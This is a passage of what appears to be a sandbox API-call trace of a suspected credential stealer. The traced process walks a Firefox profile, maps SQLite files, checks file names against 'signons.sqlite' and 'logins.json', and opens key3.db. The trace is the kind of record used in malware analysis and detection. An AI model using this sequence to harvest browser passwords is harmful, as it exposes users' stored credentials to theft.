(hMem=0x56c300) returned 0x0 [0588.057] StrStrIW (lpFirst="formhistory.sqlite", lpSrch="signons.sqlite") returned 0x0 [0588.057] StrStrIW (lpFirst="formhistory.sqlite", lpSrch="logins.json") returned 0x0 [0588.057] LocalFree (hMem=0x56afc8) returned 0x0 [0588.057] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0588.057] lstrcmpiW (lpString1="healthreport", lpString2=".") returned 1 [0588.057] lstrcmpiW (lpString1="healthreport", lpString2="..") returned 1 [0588.057] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.057] lstrlenW (lpString="\\") returned 1 [0588.057] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.057] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0588.057] lstrlenW (lpString="healthreport") returned 12 [0588.057] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0588.057] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x5d7c90 [0588.057] LocalFree (hMem=0x578c38) returned 0x0 [0588.057] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport") returned 88 [0588.057] lstrlenW (lpString="\\*.*") returned 4 [0588.057] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport") returned 88 [0588.057] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56afc8 [0588.057] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport\\*.*", lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 0x57ca60 [0588.058] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0588.058] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 1 [0588.058] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0588.058] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0588.058] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 0 [0588.058] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0588.058] LocalFree (hMem=0x56afc8) returned 0x0 [0588.058] LocalFree (hMem=0x5d7c90) returned 0x0 [0588.058] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0588.058] lstrlenW (lpString="\\") returned 1 [0588.058] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.058] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0588.058] lstrlenW (lpString="healthreport.sqlite") returned 19 [0588.058] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0588.058] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56afc8 [0588.058] LocalFree (hMem=0x578c38) returned 0x0 [0588.058] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.059] CloseHandle (hObject=0x4d8) returned 1 [0588.059] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0588.059] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56c300 [0588.059] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite", lpDst=0x56c300, nSize=0x60 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite") returned 0x60 [0588.059] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.059] CloseHandle (hObject=0x4d8) returned 1 [0588.059] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.059] GetFileSize (in: hFile=0x4d8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x118000 [0588.059] CreateFileMappingW (hFile=0x4d8, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5b4 [0588.059] MapViewOfFile (hFileMappingObject=0x5b4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3580000 [0588.131] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57bb10 [0588.131] UnmapViewOfFile (lpBaseAddress=0x3580000) returned 1 [0588.141] CloseHandle (hObject=0x5b4) returned 1 [0588.141] CloseHandle (hObject=0x4d8) returned 1 [0588.141] LocalFree (hMem=0x56c300) returned 0x0 [0588.141] StrStrIW (lpFirst="healthreport.sqlite", lpSrch="signons.sqlite") returned 0x0 [0588.141] StrStrIW (lpFirst="healthreport.sqlite", lpSrch="logins.json") returned 0x0 [0588.141] LocalFree (hMem=0x56afc8) returned 0x0 [0588.141] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0588.141] lstrcmpiW (lpString1="indexedDB", lpString2=".") returned 1 [0588.141] lstrcmpiW (lpString1="indexedDB", lpString2="..") returned 1 [0588.141] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.141] lstrlenW (lpString="\\") returned 1 [0588.141] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.141] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0588.141] lstrlenW (lpString="indexedDB") returned 9 [0588.141] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0588.141] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x5d7c90 [0588.141] LocalFree (hMem=0x578c38) returned 0x0 [0588.141] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0588.141] lstrlenW (lpString="\\*.*") returned 4 [0588.141] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0588.141] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x5d7dc8 [0588.142] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\*.*", lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 0x57ca60 [0588.142] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0588.142] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 1 [0588.142] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0588.142] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0588.142] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 1 [0588.142] lstrcmpiW (lpString1="moz-safe-about+home", lpString2=".") returned 1 [0588.142] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="..") returned 1 [0588.142] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0588.142] lstrlenW (lpString="\\") returned 1 [0588.142] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0588.142] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x578c38 [0588.142] lstrlenW (lpString="moz-safe-about+home") returned 19 [0588.142] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\") returned 86 [0588.142] LocalAlloc (uFlags=0x40, uBytes=0x154) returned 0x5e1d10 [0588.142] LocalFree (hMem=0x578c38) returned 0x0 [0588.142] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0588.142] lstrlenW (lpString="\\*.*") returned 4 [0588.142] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0588.142] LocalAlloc (uFlags=0x40, uBytes=0x15c) returned 0x5e1e70 [0588.142] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\*.*", lpFindFileData=0x52dad0 | out: lpFindFileData=0x52dad0) returned 0x57c9a0 [0588.143] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0588.143] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad0 | out: lpFindFileData=0x52dad0) returned 1 [0588.143] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0588.143] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0588.143] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad0 | out: lpFindFileData=0x52dad0) returned 1 [0588.143] lstrlenW (lpString="\\") returned 1 [0588.143] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0588.143] LocalAlloc (uFlags=0x40, uBytes=0x156) returned 0x578c38 [0588.143] lstrlenW (lpString=".metadata") returned 9 [0588.143] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\") returned 106 [0588.143] LocalAlloc (uFlags=0x40, uBytes=0x168) returned 0x5a2988 [0588.143] LocalFree (hMem=0x578c38) returned 0x0 [0588.144] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4cc [0588.144] CloseHandle (hObject=0x4cc) returned 1 [0588.144] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x74 [0588.144] LocalAlloc (uFlags=0x40, uBytes=0x168) returned 0x578c38 [0588.144] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata", lpDst=0x578c38, nSize=0x74 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata") returned 0x74 [0588.144] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4cc [0588.144] CloseHandle (hObject=0x4cc) returned 1 [0588.144] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4cc [0588.144] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0588.144] CreateFileMappingW (hFile=0x4cc, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0588.144] CloseHandle (hObject=0x4cc) returned 1 [0588.144] LocalFree (hMem=0x578c38) returned 0x0 [0588.144] StrStrIW (lpFirst=".metadata", lpSrch="signons.sqlite") returned 0x0 [0588.144] StrStrIW (lpFirst=".metadata", lpSrch="logins.json") returned 0x0 [0588.145] LocalFree (hMem=0x5a2988) returned 0x0 [0588.145] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad0 | out: lpFindFileData=0x52dad0) returned 1 [0588.145] lstrcmpiW (lpString1="idb", lpString2=".") returned 1 [0588.145] lstrcmpiW (lpString1="idb", lpString2="..") returned 1 [0588.145] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0588.145] lstrlenW (lpString="\\") returned 1 [0588.145] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0588.145] LocalAlloc (uFlags=0x40, uBytes=0x156) returned 0x578c38 [0588.145] lstrlenW (lpString="idb") returned 3 [0588.145] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\") returned 106 [0588.145] LocalAlloc (uFlags=0x40, uBytes=0x15c) returned 0x5a2988 [0588.145] LocalFree (hMem=0x578c38) returned 0x0 [0588.145] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0588.145] lstrlenW (lpString="\\*.*") returned 4 [0588.145] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0588.145] LocalAlloc (uFlags=0x40, uBytes=0x164) returned 0x578c38 [0588.145] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\*.*", lpFindFileData=0x52d858 | out: lpFindFileData=0x52d858) returned 0x5b9b50 [0588.146] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0588.146] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d858 | out: lpFindFileData=0x52d858) returned 1 [0588.147] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0588.147] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0588.147] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d858 | out: lpFindFileData=0x52d858) returned 1 [0588.147] lstrcmpiW (lpString1="818200132aebmoouht", lpString2=".") returned 1 [0588.147] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="..") returned 1 [0588.147] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0588.147] lstrlenW (lpString="\\") returned 1 [0588.147] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0588.147] LocalAlloc (uFlags=0x40, uBytes=0x15e) returned 0x5a2af0 [0588.147] lstrlenW (lpString="818200132aebmoouht") returned 18 [0588.147] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 110 [0588.147] LocalAlloc (uFlags=0x40, uBytes=0x182) returned 0x5f0330 [0588.147] LocalFree (hMem=0x5a2af0) returned 0x0 [0588.147] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 128 [0588.147] lstrlenW (lpString="\\*.*") returned 4 [0588.147] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 128 [0588.147] LocalAlloc (uFlags=0x40, uBytes=0x18a) returned 0x5a2af0 [0588.147] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*.*", lpFindFileData=0x52d5e0 | out: lpFindFileData=0x52d5e0) returned 0x5b9b10 [0588.147] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0588.147] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5e0 | out: lpFindFileData=0x52d5e0) returned 1 [0588.147] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0588.147] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0588.147] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d5e0 | out: lpFindFileData=0x52d5e0) returned 0 [0588.147] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0588.148] LocalFree (hMem=0x5a2af0) returned 0x0 [0588.148] LocalFree (hMem=0x5f0330) returned 0x0 [0588.148] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d858 | out: lpFindFileData=0x52d858) returned 1 [0588.148] lstrlenW (lpString="\\") returned 1 [0588.148] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0588.148] LocalAlloc (uFlags=0x40, uBytes=0x15e) returned 0x5a2af0 [0588.148] lstrlenW (lpString="818200132aebmoouht.sqlite") returned 25 [0588.148] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 110 [0588.148] LocalAlloc (uFlags=0x40, uBytes=0x190) returned 0x5f0330 [0588.148] LocalFree (hMem=0x5a2af0) returned 0x0 [0588.148] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0588.148] CloseHandle (hObject=0x5b0) returned 1 [0588.148] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x88 [0588.148] LocalAlloc (uFlags=0x40, uBytes=0x190) returned 0x5a2af0 [0588.148] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpDst=0x5a2af0, nSize=0x88 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 0x88 [0588.148] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0588.148] CloseHandle (hObject=0x5b0) returned 1 [0588.148] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0588.149] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x258000 [0588.149] CreateFileMappingW (hFile=0x5b0, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x660 [0588.149] MapViewOfFile (hFileMappingObject=0x660, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3580000 [0588.300] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57bba0 [0588.300] UnmapViewOfFile (lpBaseAddress=0x3580000) returned 1 [0588.316] CloseHandle (hObject=0x660) returned 1 [0588.316] CloseHandle (hObject=0x5b0) returned 1 [0588.316] LocalFree (hMem=0x5a2af0) returned 0x0 [0588.316] StrStrIW (lpFirst="818200132aebmoouht.sqlite", lpSrch="signons.sqlite") returned 0x0 [0588.316] StrStrIW (lpFirst="818200132aebmoouht.sqlite", lpSrch="logins.json") returned 0x0 [0588.316] LocalFree (hMem=0x5f0330) returned 0x0 [0588.316] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d858 | out: lpFindFileData=0x52d858) returned 0 [0588.316] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0588.316] LocalFree (hMem=0x578c38) returned 0x0 [0588.316] LocalFree (hMem=0x5a2988) returned 0x0 [0588.316] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad0 | out: lpFindFileData=0x52dad0) returned 0 [0588.316] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0588.316] LocalFree (hMem=0x5e1e70) returned 0x0 [0588.316] LocalFree (hMem=0x5e1d10) returned 0x0 [0588.316] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd48 | out: lpFindFileData=0x52dd48) returned 0 [0588.316] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0588.316] LocalFree (hMem=0x5d7dc8) returned 0x0 [0588.316] LocalFree (hMem=0x5d7c90) returned 0x0 [0588.316] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52dfc0 | out: lpFindFileData=0x52dfc0) returned 1 [0588.316] lstrlenW (lpString="\\") returned 1 [0588.316] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0588.316] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c38 [0588.316] lstrlenW (lpString="key3.db") returned 7 [0588.316] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0588.316] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x5d7c90 [0588.316] LocalFree (hMem=0x578c38) returned 0x0 [0588.316] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.316] CloseHandle (hObject=0x4d8) returned 1 [0588.317] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x54 [0588.317] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x5d7dc0 [0588.317] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db", lpDst=0x5d7dc0, nSize=0x54 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db") returned 0x54 [0588.317] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.317] CloseHandle (hObject=0x4d8) returned 1 [0588.317] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d8 [0588.317] 